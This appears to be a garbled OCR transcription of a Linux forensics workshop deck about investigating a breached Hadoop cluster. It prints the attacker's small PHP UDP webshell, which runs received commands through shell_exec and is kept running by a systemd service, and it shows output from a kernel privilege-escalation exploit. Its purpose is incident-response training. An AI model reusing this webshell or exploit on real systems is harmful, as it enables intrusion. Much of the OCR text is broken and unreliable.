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Why it matterslll... 


Large numbers of Web & database servers run under Linux 
(~ 70% of servers connected to the Internet run Linux) 


oO 


Because of this, Linux became an attractive target for 
attackers. 


If an attacker has succeed to target MySQL, Apache or 
similar server software, then he got a “target-rich” 
environment. 
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Why it matterslll... 


Linux systems become susceptible to several attacks 
including botnets, cryptocurrency miners, 
ransomware and other types of malware. 


The success of these attacks refutes the old notion 
that says machines that run Linux are less likely to be 
affected by malware. 
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Case: HDFS Cluster Breach 


x 


Hadoop Distributed File 
System Environment 


x 


Main NameNode facing 
the Internet: Master 


x 


DataNodes on seperate 
network: Slave 1 and 
Slave 2 


x 


Suspicious activity was 
noticed on network during 
last 10 days 


x 


Access to Master and 
Slaves from unusual host 


x 


New software is found on 
the system 
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Understanding how to 
navigate the system and 
where to look is one key to 
the success of your 
investigation... 
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Within the workshop, you 
will walk through the case 
covered, understand 
where to focus, and why. 
In other words, “learning 
while investigating...” 
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Protect Your Evidence... 


X Search might tamper evidence ... 
o  find— stat() 


X Disable FS atime: 
Option #1: 
x sudo mount -o remount,noatime /dev/.... 


Option #2: 

x mkdir /mnt/extdrv/rootvol 

x rootvol=/mnt/extdrv/rootvol 

X §sudo mount --bind / Srootvol 

x sudo mount -o remount,ro Srootvol 


Evidence 
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bin -> usr/bin 
boot 

dev 

etc 

home 


| 4 
lib = Lib e e 
na File Hierarchy 


1ib64 -> usr/1lib64 


libx32 - lib a 
hp mF a / af Standard 


media 
mnt 


e, 


opt 


proc . 
root ; Ee @ 
i \ 

run ‘ ij 
sbin -> usr/sbin : ee 
srv 
sys 

2 

rf 
usr 
var 


I 


7 Everything in Linux is a file, and all 
files exist under the root 


22 directories 
root@kali:~# ~ 


directory, “/”. 


Na aoqsoenoft Seago fret aera eo eS Sep Soo See SSS Se 


ir? : 
home dir’ ——> usr/php/.profile 


File Hunting... usr/php/.bashrc 


usr/php/.bash_Logout 


Expected based 
on prev. 
analysis 


/var/mail/.cache 


Searching for files that had their /var/mail/.cache/motd. legal-displayed 
metadata changed within the last 5 /var/lib/mysql/ibdatal 
days /var/lib/phps 
a /var/lib/postgresql/9.3/main/pg_stat 
-ctj -ctj a /var/lib/ureadahead/boot. pack 
find /-ctime +1 -ctime -5 ; ; /var/lib/ureadahead/pack 
Failed login /var/lib/sudo 


attempts? Lib/sudo/mail/1 
—_——S> var/log/faillog 


; . power off 
Basic compromise 


checks een NS 


Why vim to > 
PASSWA? eee 
Hunt CLI History... Ee 


Checking user .bashrc file for = jabc 
commands executed (+order of Web dir? i) 
execution)... ll 


; vim scripts/update.php 
history ls -Uh scripts/ 


vim /var/log/lastlog 
l t 


What's 37292.c ?7l! 


check it later 
12 


Hunt Suspicious Dir... 


The /usr/php directory details... 
sudo debugfs -R ‘stat <1835263>' /dev.... 


: 1835263 Type: directory Mode: 0755 £Flags: 0x80000 
eneration: 1712021741 Version: 0x00000000: 00000004 
ser: 999 Group: 999 Size: 4096 
i Directory ACL: 0 
ne 8 


= las . ¢ > a. 6 
; oxsdOB 7930. e31f0e48 -- 5 13:06:38 2019 


: @x5d98793e:e31f0e48 -- 5 13:06:38 2019 
: @x5d98793e:e31f0e48 -- 5 13:06:38 2019 
: 0x5d98793e: e3178e48 -- 5 13:06:38 2019 


fal ceusauaa Directory contents... 
Is -Ihat /usr/php 


drwxr-xr-x php 4.0K Oct 


0 ei di 
php 220 Apr 9 2014 .bash_Logout 
php 3.6K Apr 9 2014 .bashrc 
h 675 A 9 2014 .profile 


Hunt Last Logged Users... OR? Use debugfs... 


Could be checked on a live system 


using: 

last 

Ww 168.210.131 Sat Oct - (00:00) 
.168.210.131 Sat Oct - (00:00) 

lastlog > mai .168.210.131 Sat Oct < (00:00) 


2 i 168.210.131 Sat Oct - (00:04) 


sudo last -f /var/log/wtmp 


Bf sudo last -f /var/log/btmp 


706 (2+10:45) 
:20 (00:28) 
752 (00:00) 


752 (00:00) 
752 (00:00) 
752 (00:00) 
;52_ (00:00) 


14 


DOS Partition Table 
Offset Sector: 0 
Units are in 512-byte sectors 


rinses va | em | Start End Length Description 
iar i City | J : 80008000008 e800080088 e8000000001 £=Primary Table (#0) 
artes ; oa ) : 8000000000 0000002047 0000002048 Unallocated 
0000002048 0163577855 0163575808 Linux (0x83) 
0163577856 0163579903 0000002048 Unallocated 
0163579902 0167770111 0004190210 DOS Extended (0x05) 
0163579902 0163579902 0000000001 Extended Table (#1) 
0163579904 0167770111 0004190208 Linux Swap / Solaris x86 (0x82) 
6167770112 0167772159 0000002048 Unallocated 
tsurugi@forensiclab:~/Desktop/hdfs$ 


Checking File system using TSK before 


mounting: 
O  mmlis 
O  fsstat 
FILE SYSTEM INFORMATION 
File System Type: Ext4 
Volume Name: 
Volume ID: c3dfec865832e886c489166d6cefca9 
Last Written at: 2019-10-06 23:23:02 (CEST) 
Last Checked at: 2017-11-07 22:06:43 (CET) 
“a ow 
norecovery Last Mounted at: 2019-10-06 23:23:03 (CEST) 
when 
F Source OS: Linux 
mounting... Dynamic Structure 


Compat Features: Journal, Ext Attributes, Resize Inode, Dir Index 
InCompat Features: Filetype, Needs Recovery, Extents, Flexible Block Groups, 
Read Only Compat Features: Sparse Super, Large File, Huge File, Extra Inode Size 
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Hunt Files ??? 


X What are these php files doing here?! 


Easy to spot if a baseline is available... 


q 


al 
ootvol/lib/systemd/system/php7.0-Tpm.service 
ootvol/usr/bin/phar.phar7.0 
ootvol/usr/bin/php7.0 
ootvol/usr/lib/php/php7.6-fpm-checkconf 
ootvol/usr/lib/php/php-helper 
ootvol/usr/lib/php/php-maintscript-helper 
ootvol/usr/lib/php/20151012/iconv.so 
ootvol/usr/lib/php/20151012/posix.so 
ootvol/usr/lib/php/20151012/sysvshm.so 
ootvol/usr/lib/php/20151012/sysvmsg.so 
ootvol/usr/lib/php/20151012/json.so 
ootvol/usr/lib/php/20151012/ftp.so 
ootvol/usr/lib/php/20151012/shmop.so 
ootvol/usr/lib/php/20151012/ctype.so 
ootvol/usr/lib/php/20151012/opcache.so 
ootvol/usr/lib/php/20151012/tokenizer.so 
ootvol/usr/lib/php/20151012/fileinfo.so 
ootvol/usr/lib/php/20151012/sysvsem.so 
ootvol/usr/lib/php/20151012/calendar.so 
ootvol/usr/lib/php/20151012/exif.so 
ootvol/usr/lib/php/20151012/pdo.so 
ootvol/usr/lib/php/20151012/sockets.so 
ootvol/usr/lib/php/20151012/phar.so 
ootvol/usr/lib/php/20151012/readline.so 
ootvol/usr/lib/php/20151012/gettext.so 
ootvol/usr/lib/php/php7.0-fpm-reopenlogs 
ootvol/usr/lib/php/7.0/php.ini-production 
ootvol/usr/lib/php/7.0/sapi/cli 
ootvol/usr/lib/php/7.0/sapi/fpm 
ootvol/usr/lib/php/7.0/php.ini-development 
ootvol/usr/lib/php/7.0/php.ini-production.cli 
ootvol/usr/lib/php/sessionclean 
ootvol/usr/lib/tmpfiles.d/php7.0-fpm. conf 


ee eo | | | OO = — 


@ nov. 7 2017 lock 
4096 oct. 7 00:30 partial 
-rw-r--9r-- 2832 oct. 7 00:29 
-rw-r--r-- 1 root 10774 oct. 7 00:29 


1 root root 31K oct. 7 00:30 history.log 
1 root adm 232K oct. 7 00:30 term.log 


tsurugi@forensiclab:~/Desktop/hdfs$ tail -n15 rootvol/var/log/apt/history.log 
Commandline: apt-get remove oracle-java9-installer 
Requested-By: hadoop (1000) 
: oracle-java9-set-default:amd64 (9.0.1-1~webupd8~0), oracle-java9-installer:amd64 (9.0.1-1~webupd8~®0) 
: 2017-11-08 01:52:55 


Start-Date: 2017-11-08 06:12:58 
Commandline: /usr/bin/unattended-upgrade 
Install: linux-image-4.4.0-98-generic:amd64 (4.4.0-98.121, automatic), linux-image-extra-4.4.0-98-generic:amd64 /4.4.0-98.121, automatic), lLinux-headers-4.4.0-98-generic:amd64 (4.4.0-98.121, automatic), linux-he 
aders-4.4.0-98:amd64 (4.4.0-98.121, automatic) 
: Linux-headers-generic:amd64 (4.4.0.31.33, 4.4.0.98.103), lLinux-image-generic:amd64 (4.4.0.31.33, 4 4.0.98.103), lLinux-generic:amd64 (4.4.0.31.33, 4.4.0.98.103) 
: 2017-11-08 06:13:42 


Start-Date: 2019-10-07 01:30:31 

Commandline: apt install php 

Install: php7 cli:amd64 (7.0.33-Oubuntu@.16.04.6, automatic), php-common:amd64 (1:35ubuntu6.1, automatic), php7.0-fpm:amd64 (7.0.33-Oubuntu0.16.04.6, automatic), php7.0-opcache:amd64 (7.0.33-Oubuntu®.16.04.6, 
automatic), php7.0:amd64 (7.0.33-Oubuntu0.16.04.6, automatic), php7.0-common:amd64 (7.0.33-Oubuntu®.16.04.6, automatic), php:amd64 (1:7.0+35ubuntu6.1), php7.0-json:amd64 (7.0.33-Oubuntu0.16.04.6, automatic), php 
7.0-readline:amd64 (7.0.33-Oubuntu0.16.04.6, automatic) 

End-Date: 2019-10-07 61:30:41 


; 
1 
1 
0 
0 
1 
0 
1 
0 
1 
0 
1 
0 
1 
; 
0 
0 
1 
0 
1 
1 
0 
0 
0 
1 
1 
1 
0 
1 
0 
; 
0 
1 
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php config files 


will be found, 


but.... What about 


the cluster 
service? 


What's that? 


Check inode 


Hunt Files /etc 


-TW-r--r-- 
-rW-r--r-- 
-rwW-r--r-- 
-rWw-r--r-- 
-Tw-r--r-- 
-rw-r--r-- 
-rW-r--r-- 
-TW-r--r-- 
-fW-r--r-- 
-rwW-r--r-- 
-TwW-r--r-- 
-rwW-r--r-- 
-rw-r--r-- 
-rwW-r--r-- 
-TW-r--r-- 
[W-r--r-- 
-FWAC--r-- 
-rw-PNXr-- 
-rw-r--K- 
-rw-r--r-> 
-rw-r--r-- 
-fW-r--r-- 
-TW-9r--r-- 
-rw-r--r-- 
-rw-r--r-- 
-rw-r--r-- 
-fw-r--r-- 
-rw-r--r-- 
- FWXr-Xr-x 
-TW-r--r-- 
-rw-r--r-- 
-rw-r--r-- 
-rwW-r--r-- 
-rW-r--r-- 
-rw-r--r-- 
-fW-rw-r-- 
-rwW-r--r-- 
-lW-r--r-- 


eee eee ee 


70656 oct. 


4421 oct. 


18771 oct. 
70999 oct. 


oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct. 
oct: 


1194 oct. 
4987 oct. 
1040 oct. 
1074\oct. 
344 oct. 
26 oct. 

728 oct. 
670 oct. 
246 oct. 


398 oct. 
8 155 oct. 


7 00:30 root vol/etc/php/7.0/cli/php. ini 


7 00:30 rootvol/etc/php/7.0/fpm/php- fpm. conf 


ONNNNNNSN NNN SNS SSS 


6 22:23 rootvol/etc/hosts 


:30 rootvol/etc/php/7.0/fpm/pool.d/www. conf 
:30 rootvol/etc/php/7.0/fpm/php. ini 

rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvol/etc/php/7. 
rootvoLl/etc/php/7. 
rootvol /etc/php/7. 
rootvol/etc/php/7. 


0/mods-available/iconv.ini 
0/mods-available/json.ini 
0/mods-available/fileinfo.ini 
0/mods-available/readline.ini 
0/mods-available/pdo.ini 
0/mods-available/exif.ini 
0/mods-available/phar.ini 
0/mods-available/ctype.ini 
0/mods-available/gettext.ini 
0/mods-available/sysvsem.ini 
0/mods-available/ftp.ini 
0/mods-available/sysvshm. ini 
0/mods-available/shmop. ini 
0/mods-available/tokenizer.ini 
0/mods-available/opcache. ini 
0/mods-available/calendar.ini 
0/mods-available/sockets.ini 
0/mods-available/posix.ini 
0/mods-available/sysvmsq.ini 


rootvol/etc/motd. txt 
6 22:41 rootvol/etc/network/interfaces 
6 18:10 rootvol/etc/vmware-tools/tools.conf 
6 18:10 rootvol/etc/vmware-tools/tools.conf.old 
7 00:30 rootvol/etesinit dv danand hant 
7 00:30 rootval/etc/init.d/pho7.6-fom 
7 00:30 rootvol/etc/init.d/.depend.start 
7 00:30 rootvol/etc/init.d/.depend.stop 


6 22:32 rootvol/etc/hostname 
rootvol/etc/apache2/conf-available/php7.0-fpm. conf 


:30 
“30 


rootvol/etc/cron. 


d/php 


rootvwt/etc/systemd/system/cluster.service 
rootvol/etc/init/php7.0-fpm. conf 
rootvol/etc/logrotate.d/php7.0-fpm 


tsurugi@forensiclab:~/Desktop/hdfs$| sudo istat -o 2048 $hdfscase 2229804 


inode: 2229804 
Allocated 
Group: 272 


2019-10-07 00:31:29.645336261 (CEST) 
2019-10-07 00:28:16.492115650 (CEST) 
: 2019-10-07 00:28:16.492115650 (CEST) 
2019-10-07 00:28:16.492115650 (CEST) 


10604153 
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What...?? Ill 
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tsurugi@forensiclab:~/Desktop/hdfs$]| sudo icat -o 2048 Shdfscase 2229804 


[Unit] 

Description=Daemon Cluster Service 
After=network.target 
StartLimitIntervalSec=0 

[Service] 

Type=simple 


Restart=always 
RestartSec=1 
User=root 


ExecStart=/usr/bin/env php /usr/local/hadoop/bin/cluster.php 


[Install] 
antedBy=muLti-user.target 


ES eS) ey GS) 8 ey AN fe) (oy Ae ol oh Won Wale se a a a 
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=) (aye) 


aS 
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TSK icat cluster.php 


PHP Webshell used as a systemd service! 


x 


Error reporting = off 


X Socket port = 17001 


r 


PHP shell_exec() 


aA ee A sae 


tsurugi@forensiclab:~/Desktop/hdfs$ |sudo icat -o 2048 S$hdfscase 2367366 


$sock = 


socket_create(AF_INET, SOCK _DGRAM, SOL _ UDP); 


//socket_set_option ($sock, SOL SOCKET, SO REUSEADDR, 1); 
af (socket bind($sock, *0.0.0.0', 1/001) == true) j{ | 


else { 


?> 


S$error_code = socket last _error(); 
$error_msg = socket_strerror($error_ code); 
/fecho “code: ", $error_code, " msg: ", $error_msg; 


for’ ts3) 4 
socket recvfrom($sock, $message, 1024000, 0, Sip, Sport); 
eply = shell exec($message); | 
socket_sendto($sock, $reply, strlen($reply), 0, $ip, Sport); 


exit; 
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But the quest 
how did they get here 


0 
0) 
1 
0) 
1 
0) 
1 
0) 
1 
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1 
1 
0) 
0 
1 
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> Hunt Logins 
Failed Logins (btmp) 


eee 


SSN NNN NSS NN SEN SEN SNES 


sts/1 ® 192.168.2.129 Mon oct 7 on 23 - 00:48 (00:24) 


pts/0 192.168.2.1 Sun Oct 
ttyl Sun Oct 
system boot 4.4.0-98-generic Sun Oct 
ttyl Sun Oct 
system boot 4.4.0-98-generic Sun Oct 
pts/0 192.168.2.100 Sun Oct 
ttyl Sun Oct 
system boot 4.4.0-98-generic Sun Oct 
ttyl Sun Oct 


gone - no Logout 
23:27 (00:04) 
still running 
down (00:00) 
23:20 (00:28) 
22:50 (00:00) 
crash (00:11) 
23:20 (04:40) 
crash (-3:-59) 


DAAAMAAAAARAA 


Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
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master 
master 
master 
master 
master 
master 
master 
master 
master 
master 
master 
master 
master 
master 


\ master 


master 
aster 
aster 
master 
mater 
mas wer 
mastar 
maste 
master 
master 
master 
master 
master 


s 
ssh 
sshd [3403] 
sshd[24It 


sshd[2463]: 
sshd[2403]: 
sshd[2344]: 
sshd[2344]: 
sshd[2387]: 
sshd[2388]: 
sshd[2387]: 
sshd[2388]: 
sshd[2385]: 
sshd[2385]: 
sshd[2391]: 
sshd[2391]: 
sshd[2393]: 
sshd[2393]: 
sshd[2395]: 
sshd[2395]: 
sshd[2318]: 
sshd[2318]: 
sshd[2318]: 
sshd[2397]: 
sshd[2397]: 
sshd[2398]: 
sshd[2398]: 
shd[2401]: 
d[2401]: 
2403]: 


pam_unix(sshd:auth): check pass; user unknown 


pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.2.129 


Failed password for root 


Connection closed by 192. 


Failed password for 
Failed password for 


Connection closed by 192. 
Connection closed by 192. 


Failed password for root 


Connection closed by 192. 


Failed password for 


Connection closed by 192. 


Failed password for 


Connection closed by 192. 


Failed password for i 


Connection closed by 192. 


Failed password for root 


Connection closed by 192. 


from 192.168.2.129 port 56372 ssh2 
168.2.129 port 56372 [preauth] 
user amavisd from 192.168.2.129 port 56376 ssh2 
user amavisd from 192.168.2.129 port 56378 ssh2 
168.2.129 port 56376 [preauth] 
168.2.129 port 56378 [preauth] 
from 192.168.2.129 port 56374 ssh2 
168.2.129 port 56374 [preauth] 
id user security from 192.168.2.129 port 56382 ssh2 
168.2.129 port 56382 [preauth] 
id user oleg from 192.168.2.129 port 56386 ssh2 
168.2.129 port 56386 [preauth] 
user oleg from 192.168.2.129 port 56388 ssh2 
168.2.129 port 56388 [preauth] 
from 192.168.2.129 port 56356 ssh2 
168.2.129 port 56356 [preauth] 


PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.2.129 


Failed password for 


Connection closed by 192. 


Failed password for 


Failed password for root 


Failed password for 
Connection closed b 


Connection closed by 192. 


Connection closed by 192. 


192. 
>| Accepted password for hadoop from 192.168.2.129 port 56406 ssh2 


user dialer from 192.168.2.129 port 56392 ssh2 
168.2.129 port 56392 [preauth] 

user ghost from 192.168.2.129 port 56396 ssh2 
168.2.129 port 56396 [preauth] 
from 192.168.2.129 port 56402 ssh2 
168.2.129 port 56402 [preauth] 

user magnos from 192.168.2.129 port 56404 ssh2 
168.2.129 port 56404 [preauth] 


user=root 


se yc OO OO OO OO OO = = = | 


2 secs cy oO = 3 OC = CO O 


= fe) jay ee 
= je) je) SaaS 


More File Hunting... 


X Search for files added post the login activity (our reference) 


sudo find rootvol/ -type f -newercm rootvol/var/log/lastlog 


tsurugi tsurugi 8,5K oct. 7 00:29 rootvol/home/hadoop/.viminfo 

tsurugi tsurugi 35K oct. 7 00:34 rootvol/home/hadoop/temp/master 

tsurugi tsurugi 7,4K oct. 7 60: 48 i grads oto amade bash _history 
Ms i : L lL 


-rwxr-xr-x 1 


Binary used for 
exploitation 


surugi@forensiclab:~/Desktop/hdfs$ file rootvol/home/hadoop/45010 
rootvol/home/hadoop/45010® ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically Linke 


, interpreter /1ib64/1, BuildID[shal]=38f8ab3652358f154d8da3al131bfb8b1832ec23d, for GNU/Linux 3.2.0 
, not stripped 


S| Se Ae 3 ete) Sea = 


Lateral Movement 


oO 
=) fe) fo) ae ae 
= je) je) SaaS 


o Checking .bash_history file on master with auth.log on Slave2, leads to: 


Om eS 2 Ss oS ele) Saya 


6 slave2 Sghd[1074]: Server Listening on 0.0.0.0 port 22. 

6 slave2 sskd[1074]: Server Listening on :: port 22. 

7 slave2 CROM(1170]: pam_ sabe pines session): session opened per user root by (uid=0) 

z slave2 CRONIN 7@]: . 

7 slave2 sshd[11/9@ 168, cs =e 

7 slave2 sshd[1173]: 

7 slave2 systemd: pam_ inisinghtogt: user: siceaniihs session sao Apr user hadoop by (uid=0) 

7 slave2 systemd-logind[930]: New session 2 of user hadoop. 
; ; Threat actor used ssh-keys to login to Slave2 & Slave (move locally to other systems) ; 
1 1 1 
0 0 0 
0) 0 0 
<5 There is more to this, but that’s it for now :) 7 
1 1 1 
1 1 ) 1 
1 1 0 1 
0 0 0 
1 1 | 1 
0) 0 | 0 
il | 0 0 1 
0 0 l | 0 
1 1 0 0) @) 1 
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les 


Deleted Fi 


-we need them back- 


oO 


So 


Googling — probably 
: an exploit!!! 


Credit @bleidl, this is a slight modification to his original POC 
https: //github.com/br1/grlh/blob/master/get-rekt-Linux-hardened.c 


Xx Searching directory fle was found in, leads to [i re ee 


nothing! https://rickLlarabee.blogspot.com/ ebpf-and-analysis-of-get-rekt-Linux.htmL 


o After Googling around, we found it’s 
actually an exploit! 


.13.0-21-generic 


Tested on Fedora 27 


Linux Kernel < 4.13.9 4.13.9-300 
exploit 


¢ -o cve-2017-16995 
e-2017-16995$ ./cve-2017-16995 


ploit for counterfeit grsec kernels such as KSPP and linux-hardened t 


** This vulnerability cannot be exploited at all on authentic grsecurity kern 


J] creating bpf map 
sneaking evil bpf past the verifier 
creating soc pair) 
attaching bpf backdoor to socket 
skbuff => £880038c3f500 
Leaking sock 
k_rcvtimeo at offset 
ructure at ffff88 
UID from cred structure: 1000, matches the current: 1000 
hammering cred structure at ffff880038704600 
credentials patched, Launching shell.. 


uid=@Croot) gid=0Croot) groups=0Cr ),4Cadm) (cdrom) ,27Csudo) , 30Cdip) 
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EXT4 = journaling fs... 


Dump the Journal!!.. 


X If wecheck using TSK, since it’s an EXT4 fs, then even if we know what name it 
had, then still we can't access the content, since its entry will be zeroed out! 
o No longer capable of accessing the fille... 


Xx Also, if we check those * files, we will also get zero output! 
o No metadata that leads to the file... 


X Wecould try dumping them out in two steps: 
o Dump the EXT4 journal 
o Use ext4magic for recovery 
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Get them Backl!!.. 


X Step1: debugfs 
sudo debugfs -R ‘dump <8> ./journal’ /dev/..... 


o dump — option used to dump a file using inode # 
o 8-— inode # of the EXT4 journal 


xX Step2: ext4magic 
sudo ext4magic -a DATE -b DATE -j ./journal -m -d output/ 


o aandb are used to specify date after and before... 
o Jj forthe journal... 
o mtryto recover all deleted files... 


“, Sift through output 
ellen 
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Timeline Analysis?... 


We can confirm the activities and their 
sequence by doing a timeline analysis 


/05/ ,13:00:01,ESTSEDT,M...,LOG,Log File,Content Modification Rides MULnosy2, LERON pid: ] pam_unix(cron:session): session opened for user www-data by...,[CRON pid: ] pam_unix(cron:session): 
session opened for user ww ata by (uid=0),2,0S:/var/log/auth.1log, »Syslog,sha256_hash: b8e6a67fdb202938cc2fbicb666f9fe66436a9225399946F30231e384c06fdb4 
/05/ :06:38,ESTSEDT,M...,LOG,Log File,Content Modification Time, "vulnosv2, [useradd pid: ] add 'php' to group 'sudo' , [Useradd pid: 2525] add 'php' to group 'sudo',2,0S:/var/log/auth.log, 
,- syslog, sha256_| hash: bsesa67Fabzo2s38cc2Fbich6sst9fess43629225399S46"30231¢364c06Fdb4 
/05/2019,13:06:38,EST5EDT, ,LOG,Log File,Content Modification Time, - ,Vuln0Sv2 , [Useradd pid: 2525] add 'php' to shadow group ‘sudo', [Useradd pid: 2 ] add 'php' to shadow group '‘sudo',2,0S:/var/log/ 
auth. log, ,-ySyslog, ee hash: b8e6a67fdb202938cc2Fbicb666f9fe66436a9225399946F30231e384c06Fdb4 
/05/ :06:38,EST5EDT,M...,LOG,Log File,Content Modification Time, - ,VulnoSv2, [Useradd pid: 2525] new group: name=php GID= , (Useradd pid: 2525] new group: name=php GID=' ,2,0S:/var/log/auth.log, 
sa 895109, sha256_ has b8e6a67fdb202938¢c2fb1cb666F9Fe66436a9225399946f 30231 6384c06fdb4 
,ESTSEDT,M...,LOG,Log File,Content Modification Time, - ,VulnoSv2, [useradd pid: ] new user: name=php UID= GID=999 home=/usr/php she... ,[Useradd pid: ] new user: name=php 
home=/usr/php shell=/bin/bash,2,0S:/var/log/auth.1log,525 »~,SYSlog,sha256_hash: b8e6a67fdb202938cc2fbicb666f9fe66436a9225399946f 30231e384c06fdb4 
,»EST5EDT,M...,LOG,Log File,Content Modification Time,-,Vuln0Sv2,[sudo] pam_unix(sudo:session): session closed for user root,[sudo] pam_unix(sudo:session): session closed for user root,2,0S:/ 
»-,SySlog,sha256_hash: b8e6a67fdb202938cc2fb1cb666f9fe66436a9225399946F30231e384c06fdb4 


useradd Find Clear & Search options 


S 


Drag a column heade to group by that column 


Timestamp ince > Name C r Long D iption 
= a 
10S Last Ac. .a.. 1308613 OS: /usr/sbin/USSBBed Type: file 
2019-10-05 11:06: OS Last Ac.. as 1831585 OS: /etc/default /i@Radd Type: file 
2019-10-05 13:06: Log File oan 525608 [Gseesdd : 2525] add 'php' to group ‘sudo' 
2019-10-@5 13:06: Log File eae 525608 [GSeeadd pid: 2525] add ‘php’ to shadow group ‘sudo' 
2019-10-85 706: Log File oe 525608 [useradd id: 2525] new group: name=php GID=999 
2019-10-05 13:06: Log File ane 525608 [Seeedd pid: 2525] new user: name=php UID=999 GID=999 home=/usr/php shell=/bin/bash 
2019-10-05 706: File ate 525608 [sudo] root : TTY=pts/@ ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/fisepadd -d /usr/php -m --system --shé 
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Story of Case #2 


Compromise was due to weak xX Systemd service was installed after 
credentials gaining root 

o Successful Bruteforce xX Lateral movement to other systems 
Privileges escalation using Kernel using public keys (SSH) 


vulnerability (CVE-2017-16995) 


SS 


THANKS! 


Any questions? 


You can find me at 
@binaryzOne 


Se yO OOOO OOO OO OO =e | 


be po fy ey) —4 ya) EE telomere) 


=) fe) joy oe ee 


Special thanks to all the people who made and released these 


Credits & References... 


awesome resources for free: 


x KX KK KX 


Presentation template by SlidesGo 

Adam, Ideas and Blue Team Fingers, @Hexacorn 

Florian Roth, Sigma Rules and others, @cyb3rops 
Velociraptor, hayabusa, chainsaw, NirSoft, etc 

MITRE Framework, https://attack.mitre.org/techniques/ 
Sorry if we missed someone! 
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